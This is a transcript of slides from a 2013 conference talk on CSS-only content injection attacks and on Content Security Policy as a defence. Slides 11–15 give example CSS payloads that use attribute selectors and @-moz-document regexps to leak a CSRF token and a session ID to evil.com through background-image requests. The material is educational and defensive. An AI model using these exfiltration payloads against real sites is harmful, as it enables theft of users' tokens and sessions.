XSS (No, the _other_ "s") - CSSConf EU 2013

Transcript

1. XSS. (No, the other "S") Mike West https://mikewest.org G+: mkw.st/+

   Twitter: @mikewest Slides: https://mkw.st/r/cssconfeu13

2. Content Injection is scary.

3. <style> p { color: {{USER_COLOR}}; } </style> <p> Hello {{USER_NAME}},

   view your <a href="{{USER_URL}}">Account</a>. </p> <script> var id = {{USER_ID}}; </script> <!-- DEBUG: {{INFO}} -->

4. scheme://host:port

5. Problem solved!

6. http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf goo.gl/WvqNfI

7. http://contextis.co.uk/files/Browser_Timing_Attacks.pdf goo.gl/mnOlI6

8. 1. Injection 2. Execution 3. Exfiltration

9. Defacement, Phishing, etc.

10. Steal a CSRF token: <input type="hidden" name="csrf" value="123">

11. #csrf[value='0'] #csrf[value='1'] #csrf[value='01'] #csrf[value='11'] #csrf[value='001'] #csrf[value='101'] #csrf[value='011'] ... #csrf[value='111111111']

12. #csrf[value='0'] { background: url(//evil.com/?csrf=0); }

13. http://eaea.sirdarckcat.net/cssar/v2/

14. Steal a GET parameter: http://example.com/?PHPSESSID=123456 FF-Only, sorry: https://bugs.webkit.org/show_bug.cgi?id=51172

15. @-moz-document regexp(".*PHPSESSID=0.*") { background: url(//evil.com/?sess=0,1); } @-moz-document regexp(".*PHPSESSID=.0.*") { background:

    url(//evil.com/?sess=0,2); } ... http://html5sec.org/cssession/

16. Steal arbitrary attributes. <a href="/" data-secret="12345">

17. http://html5sec.org/webkit/test.html

18. Contextual Alternatives http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html goo.gl/qE08aW

19. http://traumwerk.stanford.edu/philolog/2009/10/homers_odyssey_in_art_sirens_f.html

20. None

21. http://w3.org/TR/CSP11

22. Content-Security-Policy: default-src 'none'; style-src https://mikewestdotorg.hasacdn.net; frame-src https://www.youtube.com https://www.speakerdeck.com; script-src https://mikewestdotorg.hasacdn.net

    https://ssl.google-analytics.com; img-src 'self' https://mikewestdotorg.hasacdn.net https://ssl.google-analytics.com; font-src https://mikewestdotorg.hasacdn.net

23. Content-Security-Policy: default-src ...; script-src ...; object-src ...; style-src ...; img-src

    ...; media-src ...; frame-src ...; font-src ...; connect-src ...; sandbox ...; report-uri https://example.com/reporter.cgi

24. Content-Security-Policy-Report-Only: default-src https:; report-uri https://example.com/csp-violations { "csp-report": { "document-uri": "http://example.org/page.html",

    "referrer": "http://evil.example.com/haxor.html", "blocked-uri": "http://evil.example.com/img.png", "violated-directive": "default-src 'self'", "original-policy": "...", "source-file": "http://example.com/script.js", "line-number": 10, "column-number": 11, } }

25. <script> function handleClick() { ... } </script> <button onclick="handleClick()">Click me!</button>

    <a href="javascript:handleClick()">Click me!</a>

26. <!-- index.html --> <script src="clickHandler.js"></script> <button class="clickr">Click me!</button> <a href="#"

    class="clickr">Click me!</a> <!-- clickHandler.js --> function handleClick() { ... } function init() { for (var e in document.querySelectorAll('.clickr')) e.addEventListener('click', handleClick); }

27. http://www.html5rocks.com/en/tutorials/security/content-security-policy/ https://mkw.st/r/csp

28. https://mkw.st/r/cssconfeu13 Danke! Mike West https://mikewest.org G+: mkw.st/+ Twitter: @mikewest